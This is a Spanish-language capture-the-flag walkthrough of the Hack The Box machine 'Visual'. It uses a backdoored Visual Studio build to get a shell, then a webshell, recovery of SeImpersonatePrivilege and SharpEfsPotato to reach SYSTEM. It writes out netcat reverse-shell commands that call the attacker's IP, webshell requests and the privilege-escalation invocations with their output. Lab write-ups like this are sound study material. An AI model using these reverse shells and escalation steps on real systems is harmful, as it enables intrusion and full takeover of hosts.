Visual compila un proyecto de Visual Studio segun el repositorio dado, utilizamos custom build events dentro de un proyecto para ejecutar una shell. Dentro, ejecutamos una shell en Xampp lo que nos dio acceso como Local Service, obtuvimos de vuelta el privilegio SeImpersonate para luego acceder como System por medio de SharpEfsPotato.
nmap muestra unicamente el puerto http (80) abierto.
1
2
3
4
5
6
7
8
9
10
11
# Nmap 7.94 scan initiated Mon Oct 23 16:40:18 2023 as: nmap -p80 -sV -sC -oN nmap_scan 10.10.11.234Nmap scan report for 10.10.11.234
Host is up (0.064s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.1.17)|_http-title: Visual - Revolutionizing Visual Studio Builds
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Oct 23 16:40:31 2023 -- 1 IP address (1 host up) scanned in 12.15 seconds
La informacion del sitio indica que permite la compilacion de projectos de Visual Studio de un repositorio dado y que tiene soporte para .NET 6.0 y programas en C#.
Encontramos un formulario el cual espera una direccion URL y es enviado mediante el metodo post a /submit.php.
1
2
3
4
5
6
7
<formaction="/submit.php"method="POST"><h2class="h4 mb-4">Submit Your Repo</h2><divclass="mb-3"><inputtype="url"name="gitRepoLink"class="form-control"placeholder="Enter Git Repo URL"required></div><buttontype="submit"class="btn btn-primary">Submit</button></form>
Directory Brute Forcing
feroxbuster muestra los recursos del sitio y las direcciones /uploads y /webalizer.
π ~/htb/visual ❯ feroxbuster -u http://10.10.11.234/ -w $MD ___ ___ __ __ __ __ __ ___
|__ |__ |__)|__)| / ` / \ \_/ ||\ |__
||___ |\ |\ |\__, \__/ / \ ||__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.10.11.234/
🚀 Threads │ 50 📖 Wordlist │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7 🦡 User-Agent │ feroxbuster/2.10.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true 🏁 HTTP methods │ [GET] 🔃 Recursion Depth │ 4───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 GET 9l 30w 302c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 33w 299c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 0l 0w 0c http://10.10.11.234/submit.php
200 GET 7l 36w 336c http://10.10.11.234/js/scripts.js
200 GET 8l 29w 28898c http://10.10.11.234/assets/favicon.ico
301 GET 9l 30w 339c http://10.10.11.234/uploads => http://10.10.11.234/uploads/
200 GET 11559l 23754w 250218c http://10.10.11.234/css/styles.css
200 GET 117l 555w 7534c http://10.10.11.234/
301 GET 9l 30w 338c http://10.10.11.234/assets => http://10.10.11.234/assets/
301 GET 9l 30w 335c http://10.10.11.234/css => http://10.10.11.234/css/
301 GET 9l 30w 334c http://10.10.11.234/js => http://10.10.11.234/js/
503 GET 11l 44w 402c http://10.10.11.234/examples
403 GET 11l 47w 421c http://10.10.11.234/licenses
301 GET 9l 30w 338c http://10.10.11.234/Assets => http://10.10.11.234/Assets/
200 GET 8l 29w 28898c http://10.10.11.234/Assets/favicon.ico
301 GET 9l 30w 335c http://10.10.11.234/CSS => http://10.10.11.234/CSS/
200 GET 11559l 23754w 250218c http://10.10.11.234/CSS/styles.css
301 GET 9l 30w 334c http://10.10.11.234/JS => http://10.10.11.234/JS/
200 GET 7l 36w 336c http://10.10.11.234/JS/scripts.js
403 GET 11l 47w 421c http://10.10.11.234/phpmyadmin
301 GET 9l 30w 339c http://10.10.11.234/Uploads => http://10.10.11.234/Uploads/
403 GET 11l 47w 421c http://10.10.11.234/webalizer
403 GET 11l 47w 421c http://10.10.11.234/server-status
Visual Studio
El sitio espera una direccion de un repositorio, intentamos con un servidor http para ver las solicitudes que realiza el sitio, al enviar una direccion nos muestra un mensaje de espera.
Se muestra que intenta acceder al archivo refs.
1
2
3
4
π ~/htb/visual/www ❯ httphere .
Serving HTTP on 0.0.0.0 port 80(http://0.0.0.0:80/) ...
10.10.11.234 - - [30/Oct/2023 19:23:47] code 404, message File not found
10.10.11.234 - - [30/Oct/2023 19:23:47]"GET /info/refs?service=git-upload-pack HTTP/1.1"404 -
Por otro lado el sitio muestra que no encontro el archivo .snl.
Project
Con Visual Studio creamos un nuevo proyecto utilizando la plantilla de aplicacion de consola, seleccionando finalmente la version 6.0 de .NET.
Nuestro proyecto tiene como codigo una sola linea de hola mundo.
1
Console.WriteLine("Hello, World!");
Repository
Creamos un repositorio para nuestro proyecto utilizando git agregamos el archivo README y realizamos commit.
π ~/htb/visual ❯ mkdir superapp
π ~/htb/visual ❯ cd superapp
π ~/htb/visual/superapp ❯ git init
hint: Using 'master' as the name for the initial branch. This default branch name
hint: is subject to change. To configure the initial branch name to use in all
hint: of your new repositories, which will suppress this warning, call:
hint:
hint: git config --global init.defaultBranch <name>
hint:
hint: Names commonly chosen instead of 'master' are 'main', 'trunk' and
hint: 'development'. The just-created branch can be renamed via this command:
hint:
hint: git branch -m <name>
Initialized empty Git repository in /home/kali/htb/visual/superapp/.git/
π superapp master ❯ echo"hey" > README.md
π superapp master ✗ ❯ git add README.md
π superapp master ✗ ❯ git commit -m '1 file.'[master (root-commit) 1265ccb]1 file.
1 file changed, 1 insertion(+) create mode 100644 README.md
π superapp master ❯
Git HTTP Server
Ejecutamos Git HTTP Server el cual permite acceder a repositorios, en este caso ejecutamos el servidor una carpeta por encima de nuestro repositorio.
1
2
3
4
5
6
7
8
9
10
# install# npm install -g git-http-server π superapp master ❯ cd ..
π ~/htb/visual ❯ ll
total 24K
-rw-r--r-- 1 kali kali 590 Oct 30 18:40 nmap_scan
drwxr-xr-x 3 kali kali 4.0K Oct 30 19:36 superapp
drwxr-xr-x 2 kali kali 4.0K Oct 30 28:57 www
π ~/htb/visual ❯ git-http-server -p 9090listening on http://0.0.0.0:9090 in /home/kali/htb/visual
Realizamos una prueba, vemos que funciona correctamente.
Tras investigar sobre proyectos maliciosos de Visual Studio nos topamos con multiples articulos ( 1, 2, 3) que hablan sobre ataques usando proyectos de visual studio con una puerta trasera (backdoor), se menciona el uso de custom build events los cuales se ejecutan al compilar un proyecto, aunque se muestra unicamente para proyectos en C++.
Luego de unos segundos de enviar nuestro repositorio obtuvimos una shell inversa como enox.
1
2
3
4
5
6
7
8
9
10
π repo master ✗ ❯ rlwrap nc -lvp 1335listening on [any]1335 ...
10.10.11.234: inverse host lookup failed: Unknown host
connect to [10.10.15.0] from (UNKNOWN)[10.10.11.234]49677Windows PowerShell running as user enox on VISUAL
Copyright (C)2015 Microsoft Corporation. All rights reserved.
PS C:\Windows\Temp\6a611821b24c46589efb4bbbb16d08\visualapp>whoami
visual\enox
PS C:\Windows\Temp\6a611821b24c46589efb4bbbb16d08\visualapp>
Logrando obtener nuestra flag user.txt.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
PS C:\users\enox> cd desktop
PS C:\users\enox\desktop> dir
Directory: C:\users\enox\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 10/24/2023 5:29 PM 34 user.txt
PS C:\users\enox\desktop> cat user.txt
f7c8abcd62c61e6b417e07d6e1134e5e
PS C:\users\enox\desktop>
Privesc
Observamos los usuarios, vemos al administrador y enox quienes destacan mas, y los grupos de este ultimo no muestran uno interesante.
PS C:\Windows\Temp\faddcf9f2af0361211fe87c08aadfc\superdupperapp> net users
User accounts for\\VISUAL
-------------------------------------------------------------------------------
Administrator DefaultAccount enox
Guest WDAGUtilityAccount
The command completed successfully.
PS C:\Windows\Temp\faddcf9f2af0361211fe87c08aadfc\superdupperapp> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes==================================================================================================================Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PS C:\Windows\Temp\faddcf9f2af0361211fe87c08aadfc\superdupperapp>
Enumeramos los procesos filtrando por enox para verificar si un proceso esta siendo ejecutado como system, no se observa ninguno, el unico que nos llama la atencion es httpd el cual seria el proceso de apache.
<!DOCTYPE html><html><head><metacharset="UTF-8"><metaname="viewport"content="width=device-width, initial-scale=1"><title>Build Status</title> [... snip ...]
</head><body><?php
$logFilePath = __DIR__ . '/build.output'; // Path to the output file in the current directory
if (file_exists($logFilePath)) {
$logContent = file_get_contents($logFilePath); // Get the content of the log file as a string
if (preg_match("/succeeded\./i", $logContent)) {
// Display directory listing
$dir = getcwd(); // Get the current working directory
$files = scandir($dir); // Get the list of files and directories in the directory
echo "<h2>Download your files:</h2>";
echo "<p class=\"success\">[+] Build succeeded!</p>";
echo "<ul>";
foreach ($files as $file) {
if ($file != '.' && $file != '..' && $file != 'index.php' && $file != 'build.output') {
echo "<li><a href=\"$file\" class=\"file-link\" download>$file</a></li>";
}
}
echo "</ul>";
} elseif (preg_match("/FAILED\./i", $logContent)) {
// Notify the user about build failure and present the failed content
echo "<p class=\"failure\">[!] Your build failed. Here are the lines with errors:</p>";
echo "<div class=\"toggle-code\" onclick=\"toggleCodeBlock()\">Toggle Code</div>";
echo "<div class=\"code-block\" id=\"codeBlock\">
<pre>" . htmlspecialchars($logContent) . "</pre>
</div>";
} elseif (stripos($logContent, 'Invalid Repo') !== false) {
// Repository doesn't contain a .sln file or the URL submitted is invalid
echo "<p class=\"failure\">[-] The repository doesn't contain a .sln file or the URL submitted is invalid.</p>";
} elseif (stripos($logContent, 'Timed Out') !== false) {
// Build has timed out
echo "<p class=\"timeout\">[x] Your build has timed out. Please submit again.</p>";
} else {
// Build is still in progress
echo "<p>[-] Your build is still being compiled. Please be patient.</p>";
$refreshInterval = 5; // Refresh every 5 seconds
header("refresh: $refreshInterval");
}
} else {
// Output file doesn't exist
echo "<p>[-] Your build is still being compiled. Please be patient.</p>";
$refreshInterval = 5; // Refresh every 5 seconds
header("refresh: $refreshInterval");
}
?><ahref="/index.php"class="return-btn">Return to homepage</a><script>// JavaScript code
// Function to toggle the visibility of the code block
functiontoggleCodeBlock(){varcodeBlock=document.getElementById("codeBlock");codeBlock.style.display=codeBlock.style.display==="none"?"block":"none";}</script></body></html>
submit.php crea un nuevo directorio y hace una copia de vs_status e index.php, esto para el estado de la compilacion, ademas el archivo todo.txt segun parece sirve de referencia de que repositorios compilar.
<?phpif($_SERVER['REQUEST_METHOD']=='POST'){$gitRepoLink=$_POST['gitRepoLink'];// Sanitize URL
$gitRepoLink=filter_var($gitRepoLink,FILTER_SANITIZE_URL);// Validate URL
if(!filter_var($gitRepoLink,FILTER_VALIDATE_URL)){echo'<script>alert("Invalid URL"); window.location = "/index.php";</script>';exit();}// Check scheme
$parsed_url=parse_url($gitRepoLink);if($parsed_url===false||!in_array($parsed_url['scheme'],['http','https'])){echo'<script>alert("Unsupported URL scheme"); window.location = "/index.php";</script>';exit();}$randV=bin2hex(random_bytes(15));// Generate a random variable.
$uploadPath='C:\\xampp\\htdocs\\uploads\\';$todoFilePath=$uploadPath.'todo.txt';$newDirPath=$uploadPath.$randV;// Write to file
$fileContent="Git Repo Link: $gitRepoLink, Random Variable: $randV\n";file_put_contents($todoFilePath,$fileContent,FILE_APPEND|LOCK_EX);// Create a new directory
if(!is_dir($newDirPath)){mkdir($newDirPath,true);}// Copying vs_status.php to the directory, which displays compile status
$sourceFile='C:\\xampp\\htdocs\\vs_status.php';$destinationFile=$newDirPath.'\\index.php';if(copy($sourceFile,$destinationFile)){echo'[+] File copied successfully.';}else{echo'[-] Unable to copy the file.';}// Redirect to the new directory
header('Location: /uploads/'.$randV);}?>
Local Service
Descargamos una pequena webshell en la carpeta del sitio.
Tras ejecutar un whoami vemos que el servicio httpd esta corriendo como local service.
1
2
3
4
π ~/htb/www ❯ curl -s "http://10.10.11.234/file.php?0=whoami"nt authority\local service
nt authority\local service
π ~/htb/www ❯
Observamos que tiene algunos privilegios.
1
2
3
4
5
6
7
8
9
10
11
12
π ~/htb/www ❯ curl -s "http://10.10.11.234/file.php?0=whoami%20/priv"PRIVILEGES INFORMATION
----------------------
Privilege Name Description State===================================================================SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
π ~/htb/www ❯
Privileges Back
Un post de itm4n - Give Me Back My Privileges! Please?, explica un caso en el que el usuario NT AUTHORITY\LOCAL SERVICE no tiene el privilegio SeImpersonatePrivilege algo que seria “normal” en este usuario y, se muestra como obtener devuelta este y otros privilegios creando un task (SeImpersonatePrivilege es un privilegio que nos permitiria escalar privilegios).
Para poder obtener este privilegio necesitamos ejecutar la task, para ello ejecutamos una shell inversa utilizando netcat, el cual descargamos en la maquina. Esta shell ahora es local service.
# http://10.10.11.234/uploads/file.php?0=C:/Users/Public/Documents/nc.exe%20-e%20powershell%2010.10.15.0%201336 π ~/htb/visual ❯ rlwrap nc -lvp 1336listening on [any]1336 ...
10.10.11.234: inverse host lookup failed: Unknown host
connect to [10.10.15.0] from (UNKNOWN)[10.10.11.234]49744Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\xampp\htdocs> whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State===================================================================SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
PS C:\xampp\htdocs>
#1 Task
La primera task permite obtener de vuelta los privilegios de este usuario, sin embargo no todos estan presentes, el que nos interesa es SeImpersonatePrivilege.
π ~/htb/visual ❯ rlwrap nc -nlvp 1339listening on [any]1339 ...
connect to [10.10.15.0] from (UNKNOWN)[10.10.11.234]49746Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State========================================================================SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeTcbPrivilege Act as part of the operating system Disabled
SeSystemtimePrivilege Change the system time Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
PS C:\Windows\system32>
#2 Task - SeImpersonatePrivilege
En la segunda task se explica que es posible especificar los privilegios, sin embargo, encontramos que uno de estos privilegios no es asignado y por lo tanto no ejecuta la task, en tal caso unicamente especificamos SeImpersonatePrivilege como el unico privilegio.
Tras ejecutar la task obtuvimos una shell con el privilegio SeImpersonatePrivilege.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
π ~/htb/visual ❯ rlwrap nc -lvp 1339listening on [any]1339 ...
10.10.11.234: inverse host lookup failed: Unknown host
connect to [10.10.15.0] from (UNKNOWN)[10.10.11.234]49717Microsoft Windows [Version 10.0.17763.4840](c)2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State=======================================================================SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
C:\Windows\system32>
SharpEfsPotato
Se puede aprovechar SeImpersonatePrivilege de distintos exploits tal y como se lista en SeImpersonatePrivilege (3.1.1), en este caso logramos ejecutar whoami con SharpEfsPotato.
C:\Users\Public\Documents>sep.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content c:/file.log"sep.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content c:/file.log"SharpEfsPotato by @bugch3ck
Local privilege escalation from SeImpersonatePrivilege using EfsRpc.
Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.
[+] Triggering name pipe access on evil PIPE \\localhost/pipe/ec275b61-c7fd-4014-a16a-1acd5cb6b5a4/\ec275b61-c7fd-4014-a16a-1acd5cb6b5a4\ec275b61-c7fd-4014-a16a-1acd5cb6b5a4
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
[x]RpcBindingSetAuthInfo failed with status 0x6d3
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!
C:\Users\Public\Documents>more c:\file.log
more c:\file.log
nt authority\system
C:\Users\Public\Documents>
Shell
Nuevamente ejecutamos SharpEfsPotato esta vez con una shell inversa.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
C:\Users\Public\Documents>sep.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "cd C:\users\public\documents\ ; .\nc.exe -e powershell.exe 10.10.15.0 1339"sep.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "cd C:\users\public\documents\ ; .\nc.exe -e powershell.exe 10.10.15.0 1339"SharpEfsPotato by @bugch3ck
Local privilege escalation from SeImpersonatePrivilege using EfsRpc.
Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.
[+] Triggering name pipe access on evil PIPE \\localhost/pipe/12d3e921-85df-476f-8bf5-4a34db9a925f/\12d3e921-85df-476f-8bf5-4a34db9a925f\12d3e921-85df-476f-8bf5-4a34db9a925f
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
[x]RpcBindingSetAuthInfo failed with status 0x6d3
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!
C:\Users\Public\Documents>
Tras la ejecucion logramos el acceso con una shell system.
π ~/htb/visual ❯ rlwrap nc -lvp 1339listening on [any]1339 ...
10.10.11.234: inverse host lookup failed: Unknown host
connect to [10.10.15.0] from (UNKNOWN)[10.10.11.234]49744Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\users\public\documents> whoami
whoami
nt authority\system
PS C:\users\public\documents> whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State==================================================================================================================SeCreateTokenPrivilege Create a token object Enabled
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
SeLockMemoryPrivilege Lock pages in memory Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeTcbPrivilege Act as part of the operating system Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeCreatePermanentPrivilege Create permanent shared objects Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeAuditPrivilege Generate security audits Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeTrustedCredManAccessPrivilege Access Credential Manager as a trusted caller Enabled
SeRelabelPrivilege Modify an object label Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
PS C:\users\public\documents>
Finalmente la lectura de nuestra flag root.txt.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
PS C:\users\public\documents> cd c:/users/administrator/desktop
cd c:/users/administrator/desktop
PS C:\users\administrator\desktop> dir
dir
Directory: C:\users\administrator\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 10/26/2023 11:22 AM 34 root.txt
PS C:\users\administrator\desktop> cat root.txt
cat root.txt
26bd25320fc5f626a0b1cc6fde8486c8
PS C:\users\administrator\desktop>
Fail
FullPowers Fail
Intentamos ejecutar FullPowers el cual automatizaria la ejecucion de la task la cual nos daria los privilegios de vuelta, sin embargo no se ejecuta.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
C:\Users\Public\Documents>dir
Volume in drive C has no label.
Volume Serial Number is 82EF-5600
Directory of C:\Users\Public\Documents
10/26/2023 07:07 PM <DIR> .
10/26/2023 07:07 PM <DIR> ..
10/26/2023 07:07 PM 122,368 FullPowers.exe
10/26/2023 07:06 PM 59,392 nc.exe
2 File(s) 181,760 bytes
2 Dir(s) 9,539,039,232 bytes free
C:\Users\Public\Documents>FullPowers.exe
C:\Users\Public\Documents>
GodPotato
GodPotato ejecutaba una shell inversa sin embargo la shell moria un segundo despues de realizar la conexion.
